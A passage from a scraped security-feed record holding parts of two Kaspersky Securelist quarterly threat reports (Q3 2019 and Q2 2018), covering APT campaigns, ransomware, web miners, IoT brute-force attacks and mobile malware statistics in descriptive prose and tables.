servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers \u2013 we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).\n\n## Other security news\n\n### Sodin ransomware attacks MSP\n\nIn April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered \u2013 CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.\n\nRansomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).\n\n### The impact of web mining\n\n[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.\n\nThe total power saving can be calculated using the formula \u00b7N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8\u00b111.8 gigawatts (GW) \u2013 twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '\u00b7N\u00b7t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to \u20ac250,000 for residents in Europe.\n\nYou can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).\n\n### Mac OS threat landscape\n\nSome people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.\n\nOur database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category \u2013 these threats are easier to create, offering a better return on investment for cybercriminals.\n\nThe number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years \u2013 by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million \u2013 already an increase of 9% over the previous year.\n\nYou can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).\n\n### Smart home vulnerabilities\n\nOne of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.\n\n### Smart cars and connected devices\n\nKaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience \u2013 from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.\n\nWe found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.\n\nWe continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems \u2013 including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.\n\nIf you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.\n\n### Personal data theft\n\nWe've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) \u2013 CafePress didn't notify its customers until some months after the breach had occurred.\n\nIn August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.\n\n[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.\n\nOn September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.\n\nConsumers have no direct control over the security of the personal data they disclose to online providers. However, we can limit the damage of a security breach at an online provider by ensuring that they create passwords that are unique and hard to guess, or use a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.\n\nIt's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).", "cvss3": {}, "published": "2019-11-29T10:00:12", "type": "securelist", "title": "IT threat evolution Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-11-29T10:00:12", "id": "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "href": "https://securelist.com/it-threat-evolution-q3-2019/95268/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-24T11:03:46", "description": "\n\n## Q2 figures\n\nAccording to KSN:\n\n * Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.\n * 351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.\n * Ransomware attacks were registered on the computers of 158,921 unique users.\n * Our File Anti-Virus logged 192,053,604 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,744,244 malicious installation packages\n * 61,045 installation packages for mobile banking Trojans\n * 14,119 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### General statistics\n\nIn Q2 2018, Kaspersky Lab detected 1,744,244 malicious installation packages, which is 421,666 packages more than in the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175855/180803-it-threat-evolution-q2-2018-statistics-1.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q2 2018_\n\n#### **Distribution of detected mobile apps by type**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175922/180803-it-threat-evolution-q2-2018-statistics-2-0.png>)\n\n_Distribution of newly detected mobile apps by type, Q1 2018_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175916/180803-it-threat-evolution-q2-2018-statistics-2.png>)\n\n_Distribution of newly detected mobile apps by type, Q2 2018_\n\nAmong all the threats detected in Q2 2018, the lion's share belonged to potentially unwanted RiskTool apps (55.3%); compared to the previous quarter, their share rose by 6 p.p. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (13%), whose share fell by 7 p.p. Most detected files of this type came from the families Trojan-Dropper.AndroidOS.Piom and Trojan-Dropper.AndroidOS.Hqwar.\n\nThe share of advertising apps continued to decreased by 8%, accounting for 9% (against 11%) of all detected threats.\n\nA remarkable development during the reporting period was that SMS Trojans doubled their share up to 8.5% in Q2 from 4.5% in Q1.\n\n#### **TOP 20 mobile malware**\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool or Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.04 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.17 \n3 | Trojan-Dropper.AndroidOS.Lezok.p | 4.41 \n4 | Trojan.AndroidOS.Agent.rx | 4.11 \n5 | Trojan.AndroidOS.Piom.toe | 3.44 \n6 | Trojan.AndroidOS.Triada.dl | 3.15 \n7 | Trojan.AndroidOS.Piom.tmi | 2.71 \n8 | Trojan.AndroidOS.Piom.sme | 2.69 \n9 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.54 \n10 | Trojan-Downloader.AndroidOS.Agent.ga | 2.42 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 2.25 \n12 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.80 \n13 | Trojan.AndroidOS.Agent.pac | 1.73 \n14 | Trojan.AndroidOS.Dvmap.a | 1.64 \n15 | Trojan-Dropper.AndroidOS.Lezok.b | 1.55 \n16 | Trojan-Dropper.AndroidOS.Tiny.d | 1.37 \n17 | Trojan.AndroidOS.Agent.rt | 1.29 \n18 | Trojan.AndroidOS.Hiddapp.bn | 1.26 \n19 | Trojan.AndroidOS.Piom.rfw | 1.20 \n20 | Trojan-Dropper.AndroidOS.Lezok.t | 1.19 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.04%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). In second place was Trojan.AndroidOS.Boogr.gsh (12.17%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>). Third was Dropper.AndroidOS.Lezok.p (4.41%), followed by a close 0.3 p.p. margin by Trojan.AndroidOS.Agent.rx (4.11%), which was in the third position in Q1.\n\n### **Geography of mobile threats**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175855/180803-it-threat-evolution-q2-2018-statistics-3.png>)\n\n_Map of attempted infections using mobile malware, Q2 2018 _\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | Bangladesh | 31.17 \n2 | China | 31.07 \n3 | Iran | 30.87 \n4 | Nepal | 30.74 \n5 | Nigeria | 25.66 \n6 | India | 25.04 \n7 | Indonesia | 24.05 \n8 | Ivory Coast | 23.67 \n9 | Pakistan | 23.49 \n10 | Tanzania | 22.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q2 2018, Bangladesh (31.17%) topped the list by share of mobile users attacked. China (31.07%) came second with a narrow margin. Third and fourth places were claimed respectively by Iran (30.87%) and Nepal (30.74%).\n\nRussia (8.34%) this quarter was down in 38th spot, behind Taiwan (8.48%) and Singapore (8.46%).\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected 61,045 installation packages for mobile banking Trojans, which is 3.2 times more than in Q1 2018. The largest contribution was made by Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to nearly half of detected new banking Trojans. Second came Trojan-Banker.AndroidOS.Agent.dq, accounting for about 5,000 installation packages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175900/180803-it-threat-evolution-q2-2018-statistics-4.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q2 2018_\n\n**TOP 10 mobile bankers**\n\n | **Verdict** | **%*** \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Agent.dq | 17.74 \n2 | Trojan-Banker.AndroidOS.Svpeng.aj | 13.22 \n3 | Trojan-Banker.AndroidOS.Svpeng.q | 8.56 \n4 | Trojan-Banker.AndroidOS.Asacub.e | 5.70 \n5 | Trojan-Banker.AndroidOS.Agent.di | 5.06 \n6 | Trojan-Banker.AndroidOS.Asacub.bo | 4.65 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 3.66 \n8 | Trojan-Banker.AndroidOS.Asacub.bj | 3.03 \n9 | Trojan-Banker.AndroidOS.Hqwar.t | 2.83 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 2.77 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q2 was Trojan-Banker.AndroidOS.Agent.dq (17.74%), closely followed by Trojan-Banker.AndroidOS.Svpeng.aj (13.22%). These two Trojans use phishing windows to steal information about user's banking cards and online banking credentials. Besides, they steal money through abuse of SMS services, including mobile banking. The popular banking malware Trojan-Banker.AndroidOS.Svpeng.q (8.56%) took third place in the rating, moving one notch down from its second place in Q2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-5.png>)\n\n_Geography of mobile banking threats, Q2 2018_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | **Country*** | **%**** \n---|---|--- \n1 | USA | 0.79 \n2 | Russia | 0.70 \n3 | Poland | 0.28 \n4 | China | 0.28 \n5 | Tajikistan | 0.27 \n6 | Uzbekistan | 0.23 \n7 | Ukraine | 0.18 \n8 | Singapore | 0.16 \n9 | Moldova | 0.14 \n10 | Kazakhstan | 0.13 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nOverall, the rating did not see much change from Q1: Russia (0.70%) and USA (0.79%) swapped places, both remaining in TOP 3.\n\nPoland (0.28%) rose from ninth to third place thanks to activation propagation of two Trojans: Trojan-Banker.AndroidOS.Agent.cw and Trojan-Banker.AndroidOS.Marcher.w. The latter was first detected in November 2017 and uses a toolset typical of banking malware: SMS interception, phishing windows and Device Administrator privileges to ensure its persistence in the system.\n\n### Mobile ransomware Trojans\n\nIn Q2 2018, we detected **14,119** installation packages for mobile ransomware Trojans, which is larger by half than in Q1.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175849/180803-it-threat-evolution-q2-2018-statistics-6.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q2 2018_\n\n | Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Zebt.a | 26.71 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ag | 19.15 \n3 | Trojan-Ransom.AndroidOS.Fusob.h | 15.48 \n4 | Trojan-Ransom.AndroidOS.Svpeng.ae | 5.99 \n5 | Trojan-Ransom.AndroidOS.Egat.d | 4.83 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 4.73 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 4.29 \n8 | Trojan-Ransom.AndroidOS.Small.cm | 3.32 \n9 | Trojan-Ransom.AndroidOS.Small.as | 2.61 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.80 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nThe most popular mobile ransomware is Q2 was Trojan-Ransom.AndroidOS.Zebt.a (26.71%), encountered by more than a quarter of all users who got attacked by this type of malware. Second came Trojan-Ransom.AndroidOS.Svpeng.ag (19.15%), nudging ahead of once-popular Trojan-Ransom.AndroidOS.Fusob.h (15.48%).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175857/180803-it-threat-evolution-q2-2018-statistics-7.png>)\n\n_Geography of mobile ransomware Trojans, Q2 2018_\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans**\n\n | Country* | %** \n---|---|--- \n1 | USA | 0.49 \n2 | Italy | 0.28 \n3 | Kazakhstan | 0.26 \n4 | Belgium | 0.22 \n5 | Poland | 0.20 \n6 | Romania | 0.18 \n7 | China | 0.17 \n8 | Ireland | 0.15 \n9 | Mexico | 0.11 \n10 | Austria | 0.09 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 went to the United States (0.49%); the most active family in this country was Trojan-Ransom.AndroidOS.Svpeng:\n\n | Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 53.53% \n2 | Trojan-Ransom.AndroidOS.Svpeng.ae | 16.37% \n3 | Trojan-Ransom.AndroidOS.Svpeng.snt | 11.49% \n4 | Trojan-Ransom.AndroidOS.Svpeng.ab | 10.84% \n5 | Trojan-Ransom.AndroidOS.Fusob.h | 5.62% \n6 | Trojan-Ransom.AndroidOS.Svpeng.z | 4.57% \n7 | Trojan-Ransom.AndroidOS.Svpeng.san | 4.29% \n8 | Trojan-Ransom.AndroidOS.Svpeng.ac | 2.45% \n9 | Trojan-Ransom.AndroidOS.Svpeng.h | 0.43% \n10 | Trojan-Ransom.AndroidOS.Zebt.a | 0.37% \n \n_* Unique users in USA attacked by this malware as a percentage of all users of Kaspersky Lab's mobile antivirus in this country who were attacked by ransomware Trojans._\n\nItaly (0.28%) came second among countries whose residents were attacked by mobile ransomware. In this country, most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a. Third place was claimed by Kazakhstan (0.63%), where Trojan-Ransom.AndroidOS.Small.cm was the most popular mobile ransomware.\n\n## Attacks on IoT devices\n\nJudging by the data from our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), brute forcing Telnet passwords is the most popular method of IoT malware self-propagation. However, recently there has been an increase in the number of attacks against other services, such as control ports. These ports are assigned services for remote control over routers \u2013 this feature is in demand e.g. with internet service providers. We have observed attempts to launch attacks on IoT devices via port 8291, which is used by Mikrotik RouterOS control service, and via port 7547 (TR-069), which was used, among other purposes, for managing devices in the Deutsche Telekom network.\n\nIn both cases the nature of attacks was much more sophisticated than plain brute force; in particular, they involved exploits. We are inclined to think that the number of such attacks will only grow in the future on the back of the following two factors:\n\n * Brute forcing a Telnet password is a low-efficiency strategy, as there is a strong competition between threat actors. Each few seconds, there are brute force attempts; once successful, the threat actor blocks such the access to Telnet for all other attackers.\n * After each restart of the device, the attackers have to re-infect it, thus losing part of the botnet and having to reclaim it in a competitive environment.\n\nOn the other hand, the first attacker to exploit a vulnerability will gain access to a large number of device, having spent minimum time.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175929/180803-it-threat-evolution-q2-2018-statistics-8.png>)\n\n_Distribution of attacked services' popularity by number of unique attacking devices, Q2 2018_\n\n### Telnet attacks\n\nThe scheme of attack is as follows: the attackers find a victim device, check if Telnet port is open on it, and launch the password brute forcing routine. As many manufacturers of IoT devices neglect security (for instance, they reserve service passwords on devices and do not leave a possibility for the user to change them routinely), such attacks become successful and may affect entire lines of devices. The infected devices start scanning new segments of networks and infect new, similar devices or workstations in them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-9.png>)\n\n_Geography of IoT devices infected in Telnet attacks, Q2 2018_\n\n#### **TOP 10 countries by shares of IoT devices infected via Telnet**\n\n | Country | %* \n---|---|--- \n1 | Brazil | 23.38 \n2 | China | 17.22 \n3 | Japan | 8.64 \n4 | Russia | 7.22 \n5 | USA | 4.55 \n6 | Mexico | 3.78 \n7 | Greece | 3.51 \n8 | South Korea | 3.32 \n9 | Turkey | 2.61 \n10 | India | 1.71 \n \n_* Infected devices in each specific country as a percentage of all IoT devices that attack via Telnet._\n\nIn Q2, Brazil (23.38%) took the lead in the number of infected devices and, consequently, in the number of Telnet attacks. Next came China (17.22%) by a small margin, and third came Japan (8.64%).\n\nIn these attacks, the threat actors most often downloaded Backdoor.Linux.Mirai.c (15.97%) to the infected devices.\n\n#### **TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n | Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.c | 15.97 \n2 | Trojan-Downloader.Linux.Hajime.a | 5.89 \n3 | Trojan-Downloader.Linux.NyaDrop.b | 3.34 \n4 | Backdoor.Linux.Mirai.b | 2.72 \n5 | Backdoor.Linux.Mirai.ba | 1.94 \n6 | Trojan-Downloader.Shell.Agent.p | 0.38 \n7 | Trojan-Downloader.Shell.Agent.as | 0.27 \n8 | Backdoor.Linux.Mirai.n | 0.27 \n9 | Backdoor.Linux.Gafgyt.ba | 0.24 \n10 | Backdoor.Linux.Gafgyt.af | 0.20 \n \n_*Proportion of downloads of each specific malware program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks_\n\n### SSH attacks\n\nSuch attacks are launched similarly to Telnet attacks, the only difference being that they require to bots to have an SSH client installed on them to brute force credentials. The SSH protocol is cryptographically protected, so brute forcing passwords require large computational resources. Therefore, self-propagation from IoT devices is inefficient, and full-fledged servers are used to launch attacks. The success of an SSH attack hinges on the device owner or manufacturers' faults; in other words, these are again weak passwords or preset passwords assigned by the manufacturer to an entire line of devices.\n\nChina took the lead in terms of infected devices attacking via SSH. Also, China was second in terms of infected devices attacking via Telnet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-10.png>)\n\n_Geography of IoT devices infected in SSH attacks, Q2 2018_\n\n#### **TOP 10 countries by shares of IoT devices attacked via SSH**\n\n | Country | %* \n---|---|--- \n1 | China | 15.77% \n2 | Vietnam | 11.38% \n3 | USA | 9.78% \n4 | France | 5.45% \n5 | Russia | 4.53% \n6 | Brazil | 4.22% \n7 | Germany | 4.01% \n8 | South Korea | 3.39% \n9 | India | 2.86% \n10 | Romania | 2.23% \n \n_*The proportion of infected devices in each country as a percentage of all infected IoT devices attacking via SSH_\n\n## Online threats in the financial sector\n\n### Q2 events\n\n#### **New banking Trojan DanaBot**\n\nThe Trojan DanaBot was detected in May. It has a modular structure and is capable of loading extra modules with which to intercept traffic, steal passwords and crypto wallets \u2013 generally, a standard feature set for this type of a threat. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojans' main body. DanaBot initially targeted Australian users and financial organizations, however in early April we noticed that it had become active against the financial organizations in Poland.\n\n#### **The peculiar BackSwap technique**\n\nThe banking Trojan BackSwap turned out much more interesting. A majority of similar threats including **Zeus, Cridex **and **Dyreza **intercept the user's traffic either to inject malicious scripts into the banking pages visited by the victim or to redirect it to phishing sites. By contrast, BackSwap uses an innovative technique for injecting malicious scripts: using WinAPI, it emulates keystrokes to open the developer console in the browser, and then it uses this console to inject malicious scripts into web pages. In a later version of BackSwap, malicious scripts are injected via the address bar, using JavaScript protocol URLs.\n\n#### **Carbanak gang leader detained**\n\nOn March 26, Europol announced the arrest of a leader of the cybercrime gang behind Carbanak and Cobalt Goblin. This came 